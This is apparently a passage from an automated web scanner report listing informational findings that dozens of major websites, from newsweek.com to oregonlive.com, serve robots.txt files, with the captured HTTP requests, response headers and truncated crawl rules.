Expires: Sat, 09 Apr 2011 13:44:28 GMT
Content-Length: 227
Keep-Alive: timeout=3, max=997
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://www.ne
...[SNIP]...

24.592. http://www.newsweek.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsweek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsweek.com

Response

HTTP/1.1 200 OK
Age: 58
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:26:37 GMT
ETag: "1b80788-24-4875a639ecac0"
Last-Modified: Mon, 24 May 2010 17:29:55 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 2022418699 2022417254
Content-Length: 36
Connection: Close

User-agent: *
Disallow: /search.html

24.593. http://www.nextel.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nextel.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:42:27 GMT
Content-length: 148
Content-type: text/plain
Last-modified: Sat, 14 Mar 2009 10:44:53 GMT
Accept-ranges: bytes
Connection: close

#
# robots.txt for
#
# Dynamic Apps
User-agent: *
Disallow: /NASApp/registration
Disallow: /wps/
User-agent: nol-Ultraseek
Disallow: /wps/


24.594. http://www.nextinsure.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextinsure.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nextinsure.com

Response

HTTP/1.1 200 OK
Content-Length: 696
Content-Type: text/plain
Last-Modified: Wed, 19 Dec 2007 19:12:47 GMT
Accept-Ranges: bytes
ETag: "80a1d6237342c81:1a62"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:40:00 GMT
Connection: close

User-agent: *
Crawl-delay: 10
#Directories
Disallow: /common/
Disallow: /bin/
Disallow: /geolocation/
Disallow: /js/
Disallow: /images/
Disallow: /images/accounts/
Disallow: /js/
Disallow: /
...[SNIP]...

24.595. http://www.nfl.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nfl.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nfl.com

Response

HTTP/1.0 200 OK
ETag: W/"451-1301521068000"
Last-Modified: Wed, 30 Mar 2011 21:37:48 GMT
Content-Type: text/plain
Cache-Control: max-age=55
Expires: Sat, 02 Apr 2011 13:25:54 GMT
Date: Sat, 02 Apr 2011 13:24:59 GMT
Content-Length: 451
Connection: close

# robots.txt for http://www.nfl.com/

User-agent: *
Disallow: /test/ # these are test pages that should not get indexed
Disallow: /widgets/ # there is no reason to index our widgets. They should
...[SNIP]...

24.596. http://www.nhl.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nhl.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nhl.com

Response

HTTP/1.0 200 OK
ETag: "400fa75-227-49f99e5ea68c0"
Server: Apache
Last-Modified: Tue, 29 Mar 2011 07:20:43 GMT
Cteonnt-Length: 551
Content-Type: text/plain; charset=utf-8
Cache-Control: private, max-age=60
Date: Sat, 02 Apr 2011 14:19:24 GMT
Content-Length: 551
Connection: close

Sitemap: http://www.nhl.com/sitemap-news.xml
Sitemap: http://www.nhl.com/sitemap-video-index.xml
Sitemap: http://www.nhl.com/sitemap-adhoc.xml
Sitemap: http://www.nhl.com/sitemap-draft.xml
Sitemap: ht
...[SNIP]...

24.597. http://www.nickjr.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nickjr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nickjr.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 118
Content-Type: text/plain
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:20 GMT; path=/
ETag: W/"118-1301149306000"
Vary: User-Agent
Cache-Control: max-age=1200
Date: Sat, 02 Apr 2011 13:31:20 GMT
Connection: close

User-agent: *
Disallow: /test/
Disallow: /ads/
Disallow: /static/
sitemap: http://www.nickjr.com/sitemap_index.jsp

24.598. http://www.nih.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nih.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nih.gov

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:23:39 GMT
Content-type: text/plain
Last-modified: Fri, 14 Jan 2011 22:55:27 GMT
Content-length: 1392
Etag: "570-4d30d45f"
Accept-ranges: bytes
Connection: close

User-agent: PicoSearch/1.0
Disallow: /news/information/knight/
Disallow: /nidcd/
Disallow: /od/ors/od/oqm/bestpractices/
Disallow: /od/ors/oam/policy/
Disallow: /od/ors/dss/eurest/
Disallow: /o
...[SNIP]...

24.599. http://www.nike.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nike.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Nov 2010 21:54:30 GMT
ETag: "12b-4956ef37bca26"
Content-Type: text/plain
Cache-Control: max-age=1185
Expires: Sat, 02 Apr 2011 14:04:24 GMT
Date: Sat, 02 Apr 2011 13:44:39 GMT
Content-Length: 299
Connection: close

# *.nike.com robots.txt -- just crawl it.
User-agent: *
Allow: /
Disallow: /nikegolf/global/
Disallow: /nikegolf/en_US/
Disallow: /nikegolf/en_CA/
Disallow: /nikegolf/en_EU/
Disallow: /nikegolf/ko_KR/
...[SNIP]...

24.600. http://www.nintendo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nintendo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nintendo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:01 GMT
Server: Apache
Set-Cookie: NINTENDO=173.193.214.243.1301753941037135; path=/; expires=Thu, 31-Mar-16 14:19:01 GMT; domain=.nintendo.com
Last-Modified: Tue, 12 Oct 2010 15:13:31 GMT
ETag: "2f8f1-2e-4926ceb70bcc0"
Accept-Ranges: bytes
Content-Length: 46
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONo OTPa OUR SAMa NOR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE OTC", policyref="http://www.nintendo.com/w3c/p3p.xml"
NODE: swebe2
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerWEB_NINTENDO=2052065290.20480.0000; path=/

User-agent: *
Disallow: /consumer/newsletters

24.601. http://www.nola.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nola.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nola.com

Response

HTTP/1.0 200 OK
Server: Apache
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:37:08 GMT
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:37:07 GMT
Content-Length: 447
Connection: close
Set-Cookie: Apache=69.2.101.254.1301751427713009; path=/; expires=Sun, 01-Apr-12 13:37:07 GMT

# Robots.txt for http://www.nola.com/
# Last updated 03/01/2011

Sitemap: http://blog.nola.com/www-sitemapindex.xml

User-agent: *
Disallow: /auctions/
Disallow: /cgi-bin/
Disallow: /printer/
Disallo
...[SNIP]...

24.602. http://www.northerntool.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.northerntool.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.northerntool.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: CP='NOI DSP COR NID OTPi OUR NOR'
Last-Modified: Thu, 10 Feb 2011 14:50:48 GMT
ETag: "c0ee6-290-b4ff6200"
Accept-Ranges: bytes
Content-Length: 656
Content-Type: text/plain; charset=windows-1252
Date: Sat, 02 Apr 2011 13:44:46 GMT
Connection: close
Set-Cookie: stop_mobi=yes; path=/; domain=northerntool.com

# Denies search engine access to disallowed url's

User-agent: *
Disallow: /ab_testcontent/
Disallow: /ebay/
Disallow: /Html_no_corem/
Disallow: /library/
Disallow: /merchandising/
Disallow: /
...[SNIP]...

24.603. http://www.notebookreview.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.notebookreview.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.notebookreview.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 30 Mar 2010 19:05:00 GMT
Accept-Ranges: bytes
ETag: "0162ce53bd0ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:05:45 GMT
Connection: close
Content-Length: 218

Sitemap: /sitemap.xml
User-Agent: *
Disallow: /mobile/
Disallow: /printArticle.asp
Disallow: /emailArticle.asp
Disallow: /deals/tellFriend.asp
Disallow: /scripts/
Disallow: /shared/
Allow: /sh
...[SNIP]...

24.604. http://www.npr.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 21 Jul 2004 21:14:03 GMT
ETag: "ee-3dfc0e1ac1cc0"
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Thu, 31 Mar 2011 18:08:20 GMT
Keep-Alive: timeout=10, max=4992
Content-Type: text/plain
Connection: close
Date: Sat, 02 Apr 2011 13:43:59 GMT
Age: 265
Content-Length: 238

User-agent: *
Disallow: /cgi-bin
Disallow: /ramfiles/
Disallow: /*.smil
Disallow: /*.asx
Disallow: /*.ram
Disallow: /*.rmm
Disallow: /*.js
Disallow: /*.au
Disallow: /stations/force/force_localization.
...[SNIP]...

24.605. http://www.nps.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nps.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nps.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:29 GMT
Content-Length: 61
Content-Type: text/plain
ETag: "1b0000002fd15d-3d-49fe1fba7f40a"
Last-Modified: Fri, 01 Apr 2011 21:20:45 GMT
Accept-Ranges: bytes
Server: Apache
Connection: close

User-agent: *
Disallow: /loader.cfm
Disallow: /*loader.cfm*

24.606. http://www.nwsource.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nwsource.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nwsource.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 30 Dec 2008 20:07:55 GMT
ETag: "14810-6b8-259adcc0"
Accept-Ranges: bytes
Content-Length: 1720
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:34:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:34:03 GMT
Connection: close

# $Id: robots.txt,v 1.7.2.1 2007/03/23 18:57:07 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

24.607. http://www.nydailynews.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nydailynews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:38 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 16:13:58 GMT
Accept-Ranges: bytes
Content-Length: 1440
Keep-Alive: timeout=3, max=1000
Content-Type: text/plain
Content-Language: en
Age: 0
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:23:20 GMT; Path=/

sitemap: http://www.nydailynews.com/sitemap/data/sitemap.xml

User-agent: *
Disallow: /nydn/form/webSearch.jsp
Disallow: /nydn/form/register.jsp
Disallow: /nydn/form/login.jsp
Disallow: /nydn/em
...[SNIP]...

24.608. http://www.nypost.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nypost.com

Response

HTTP/1.0 200 OK
Content-Length: 378
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=431
Date: Sat, 02 Apr 2011 13:39:00 GMT
Connection: close

# Robots.txt
# The New York Post Online Edition

User-Agent: MetaCartaRSSFeedReader
Disallow:
Disallow: /cgi-bin/
Disallow: /shared-content/

User-agent: *
Disallow: /seven
Disallow: /admin
...[SNIP]...

24.609. http://www.nytimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:43:14 GMT
Content-length: 637
Content-type: text/plain
Set-cookie: RMID=0a35de834e6f4d9719e2caff; expires=Sunday, 01-Apr-2012 12:43:14 GMT; path=/; domain=.nytimes.com
Last-modified: Mon, 26 Apr 2010 17:28:40 GMT
Accept-ranges: bytes
Connection: keep-alive

User-agent: *
Allow: /ads/public/
Disallow: /ads/
Disallow: /adx/bin/
Disallow: /aponline/
Disallow: /archives/
Disallow: /auth/
Disallow: /cnet/
Disallow: /college/
Disallow: /external/
Disallow: /fi
...[SNIP]...

24.610. http://www.ocregister.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ocregister.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ocregister.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:46 GMT
Server: Apache
Cache-Control: max-age=86400
Last-Modified: Sat, 02 Apr 2011 09:46:21 GMT
Expires: Sun, 03 Apr 2011 09:46:21 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 1046
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /common/bc/
Disallow: /common/bc3/
Disallow: /common/gabriels/
Disallow: /common/gsa/
Disallow: /common/printer/
Disallow: /common/pluck/
Disallow: /common/tools/
Disallow: /co
...[SNIP]...

24.611. http://www.octonet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.octonet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.octonet.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 14:17:09 GMT
Connection: close
Content-Length: 97

User-agent: ia_archiver
Disallow: /

User-agent: *
Disallow: /~sys~/
Disallow: /%7esys%7e/

24.612. http://www.officedepot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.officedepot.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 10 Nov 2010 05:03:55 GMT
ETag: "292-c8bd24c0"
P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:39:10 GMT
Content-Length: 658
Connection: close
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com

# Robots.txt file for http://www.officedepot.com
#

User-agent: *
Disallow: /account/
Disallow: /ads/
Disallow: /b2b/
Disallow: /billboard/
Disallow: /cart/
Disallow: /catalogrequest/
Disallow: /check
...[SNIP]...

24.613. http://www.officemax.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officemax.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.officemax.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 04 Feb 2011 20:00:30 GMT
ETag: "5ed-49b7a5585f380"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:19:30 GMT
Content-Length: 1517
Connection: close

#Updated - 01/20/11

User-agent: *

Sitemap: http://www.officemax.com/sitemap.xml


Disallow: *&csId*
Disallow: *.swf
Disallow: */promotions.jsp?cat*
Disallow: *?sp=true
Disallow: *?view=li
...[SNIP]...

24.614. http://www.olivegarden.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.olivegarden.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.olivegarden.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 168
Date: Sat, 02 Apr 2011 13:52:35 GMT
Content-Type: text/plain
ETag: "0d4206240f1ca1:0"
Set-Cookie: olive=R3372667923; path=/
Last-Modified: Tue, 11 May 2010 19:30:16 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET

# Robots.txt

User-agent: *
Disallow:

User-agent: *
Disallow: /OEG95RTPHTM/

User-Agent: MJ12bot
Disallow:

Sitemap: http://www.olivegarden.com/sitemap.xml

24.615. http://www.onemanga.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onemanga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onemanga.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:06:47 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Tue, 25 Jan 2011 17:56:01 GMT
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: geo_code="1.202.220.5:CN:China"; expires=Sun, 03-Apr-2011 14:05:40 GMT; Max-Age=86400; Path=/
Vary: Accept-Encoding
Content-Length: 23
Age: 67
X-Cache: HIT
Via: proxy02

User-agent: *
Allow: /

24.616. http://www.onlywire.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlywire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlywire.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:31 GMT
Server: Apache
Last-Modified: Tue, 29 Jun 2010 06:30:35 GMT
ETag: "984a3-1a-48a255ff298c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

24.617. http://www.oodle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oodle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/plain;charset=utf-8
Date: Sat, 02 Apr 2011 13:36:37 GMT
Content-Length: 1254
Connection: close

User-agent: *
Disallow: /api/
Disallow: /r/
Disallow: /ra/
Disallow: /rb/
Disallow: /rc/
Disallow: /rd/
Disallow: /re/
Disallow: /rf/
Disallow: /rg/
Disallow: /rh/
Disallow: /ri/
Disallow: /rj/
Disall
...[SNIP]...

24.618. http://www.opentable.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opentable.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:45:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: txt; charset=utf-8
Content-Length: 1041

# robots.txt for http://www.opentable.com/

User-agent: *
Disallow: /_LBStatus
Disallow: /admin
Disallow: /aspnet_client
Disallow: /bin/
Disallow: /Components
Allow: /img/restimages
Allow: /i
...[SNIP]...

24.619. http://www.opera.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opera.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opera.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:19 GMT
Server: Apache
Last-Modified: Thu, 04 Jun 2009 12:55:31 GMT
ETag: "20043abd-4e-46b854a7756c0"
Accept-Ranges: bytes
Content-Length: 78
Content-Type: text/plain
Vary: Accept-Encoding
Connection: close

User-agent: *
Disallow: /*?viewmobile
Disallow: /*?viewfull
Disallow: /portal

24.620. http://www.opinionlab.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opinionlab.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opinionlab.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/plain
Last-Modified: Tue, 23 Nov 2010 17:14:44 GMT
Accept-Ranges: bytes
ETag: "bef471ec318bcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
ETags: ""
Date: Sat, 02 Apr 2011 14:06:25 GMT
Connection: close
Content-Length: 626

User-agent: *
Disallow: /_MACOSX/
Disallow: /_notes/
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /private/
Disallow: /247ometricv2/
Disallow: /247ometricv21/
Disallow: /247ometricv21/A/
Dis
...[SNIP]...

24.621. http://www.opm.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opm.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opm.gov

Response

HTTP/1.0 200 OK
Content-Length: 830
Content-Type: text/plain
Last-Modified: Wed, 10 Dec 2008 17:21:13 GMT
Accept-Ranges: bytes
ETag: "9c586eb3eb5ac91:1244"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:13:00 GMT
Connection: close

User-agent: *
Disallow: /insure/carriers
Disallow: /carrier/dentalvision
Disallow: /spiders/not/here/
Disallow: /2KSpanish
Disallow: /508FEORP
Disallow: /_aspdlls
Disallow: /_CFCR
Disallow: /_
...[SNIP]...

24.622. http://www.opportunity.co/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opportunity.co
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.opportunity.co

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 01 Apr 2011 21:59:35 GMT
ETag: "47b014e-cd-8682ffc0"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /_css
Disallow: /_images
Disallow: /_includes
Disallow: /_js
Disallow: /_process
Disallow: /event
Disallow: /media
Disallow: /now
Disallow: /pigsfly
Disallow: /web-dom
...[SNIP]...

24.623. http://www.oprah.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oprah.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oprah.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 26 Jan 2011 17:39:10 GMT
ntCoent-Length: 217
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Cache-Control: private, max-age=325
Date: Sat, 02 Apr 2011 13:35:56 GMT
Content-Length: 217
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.oprah.com
Set-Cookie: check_loc=US; expires=Sun, 03-Apr-2011 13:35:56 GMT; path=/

User-agent: *
Allow: /
Disallow: /*preview=*
Disallow: *search*
Disallow: *print*
Disallow: *profile*
Disallow: *plug*
Disallow: *messageID*
Disallow: *searchID*
Disallow: *pollid*
Disallow: *cmd*
Dis
...[SNIP]...

24.624. http://www.oracle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oracle.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
SS_FRIENDLY_EXT: txt
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=290;ecid=64613523913364888,0)
Date: Sat, 02 Apr 2011 13:40:06 GMT
Content-Length: 20436
Connection: close

# /robots.txt for www.oracle.com
User-agent: *
Sitemap: http://www.oracle.com/oracle-sitemap.xml
Sitemap: http://www.oracle.com/wocportal/page/wocprod/rssmanager/admin/rss/html/events_sitemap.xml

...[SNIP]...

24.625. http://www.orbitz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orbitz.com

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 28 Mar 2011 17:17:09 GMT
ETag: "23d-49f8e1d160f40"
Content-Type: text/plain
Content-Length: 573
Server: Apache
Date: Sat, 02 Apr 2011 13:33:54 GMT
Age: 155441
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

## Last updated March 24, 2010
User-agent: *
Disallow: /d.gif
Disallow: /global/
Disallow: /img/
Disallow: /partner/
Disallow: /creditcard/
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /js.ng/
D
...[SNIP]...

24.626. http://www.orchardbank.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orchardbank.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orchardbank.com

Response

HTTP/1.1 200 OK
Server: ""
Date: Sat, 02 Apr 2011 13:36:16 GMT
Content-length: 16427
Content-type: text/plain
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301751376.598483; path=/; expires=Tue, 30-Mar-2021 13:36:16 GMT
P3p: CP="CAO COR ADM DEVa TAIa PSA PSD IVAa IVDa CONa HIS OUR LEG CNT"
Expires: Sat, 02 Apr 2011 14:06:16 GMT
Last-modified: Fri, 19 Feb 2010 11:33:44 GMT
Surrogate-control: no-store
Content-language: en
Set-cookie: LASCCSSA2001US_ID=0000HWufcEw8HLGtyVnhPN8Jp09:15nj89jhq; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close

# mapping for web robots
# Added Allow, disallows & Sitemap directives as per SEO requirements for Aug 09 release.
User-agent: *
# ----------------------Allows Start -------------------------------
...[SNIP]...

24.627. http://www.oregonlive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oregonlive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oregonlive.com

Response

HTTP/1.0 200 OK
Server: Apache
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:43:52 GMT
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:43:51 GMT
Content-Length: 388
Connection: close
Set-Cookie: Apache=69.2.101.254.1301751831418932; path=/; expires=Sun, 01-Apr-12 13:43:51 GMT

# Robots.txt for http://www.oregonlive.com/
# Last updated 03/01/2011

Sitemap: http://blog.oregonlive.com/www-sitemapindex.xml

User-agent: *
Disallow: /auctions/
Disallow: /cgi-bin/
Disallow: /print
...[SNIP]...

